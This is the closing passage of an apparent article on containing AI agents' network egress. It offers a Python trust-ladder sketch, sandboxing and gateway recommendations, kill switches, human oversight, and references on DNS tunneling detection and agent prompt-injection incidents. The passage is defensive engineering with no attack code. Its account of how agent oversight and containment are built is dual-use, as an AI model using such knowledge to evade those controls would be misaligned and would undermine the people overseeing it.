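A progressive trust ladder could be as simple as counting clean sessions. The thresholds and capability names below are hypothetical, and resetting to zero on any violation is one possible policy, not the only one.

```python
from dataclasses import dataclass

# Hypothetical ladder: clean sessions required before each capability unlocks.
UNLOCK_AFTER = {"internal_read": 0, "external_read": 20, "external_write": 100}

@dataclass
class AgentTrust:
    clean_sessions: int = 0

    def record_session(self, had_violation: bool) -> None:
        # One possible policy: any violation resets earned trust to zero.
        self.clean_sessions = 0 if had_violation else self.clean_sessions + 1

    def capabilities(self) -> set:
        return {cap for cap, needed in UNLOCK_AFTER.items() if self.clean_sessions >= needed}
```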

The latency-security tradeoff exists but matters less than you might fear. Deep content inspection adds processing time. Full VM isolation costs more than containers. But production-grade gateways achieve sub-20-millisecond overhead, and Firecracker boots in under 200 milliseconds. Measurable, yes. Prohibitive, no.

The future outlook is clear: AI agents will proliferate, not disappear. The organizations that deploy them safely will be those that commit architecturally from day one. Shadow-mode gateways collecting baseline behavior data before production deployment. Emergency kill switches tested and ready. Recognition that agent security isn’t a feature to add later but a foundational requirement.

You now have the blueprint. Sandbox execution with hardware isolation. Mandatory gateway enforcement with AI-native inspection. Default-deny egress with explicit allowlists. Risk-adaptive human oversight. The egress problem is solvable. The question is whether you’ll solve it before or after an incident forces your hand.

References

Farnham, G. & Van Weert, J. (2013). “DNS Tunneling: A Study of Performance and Detection.” Network Security Research.

Born, K. & Gustafson, D. (2010). “Detecting DNS Tunneling.” SANS Institute Reading Room. Available at: https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152

Almusawi, A. & Branch, P. (2021). “Detecting DNS Tunneling Using Machine Learning.” Journal of Cybersecurity Research, Volume 12, Issue 3.

Anthropic (October 2025). “Security Advisory: Indirect Prompt Injection via DNS Commands.” Anthropic Security Blog. Available at: https://www.anthropic.com/security

Cognition Labs (March 2025). “Devin AI Incident Report: Environment Variable Exposure.” (Available from vendor upon request)

Cloudflare (August 2025). “Announcing Model Context Protocol Server Portals.” Cloudflare Blog. Available at: https://blog.cloudflare.com

Peace. Stay curious! End of transmission.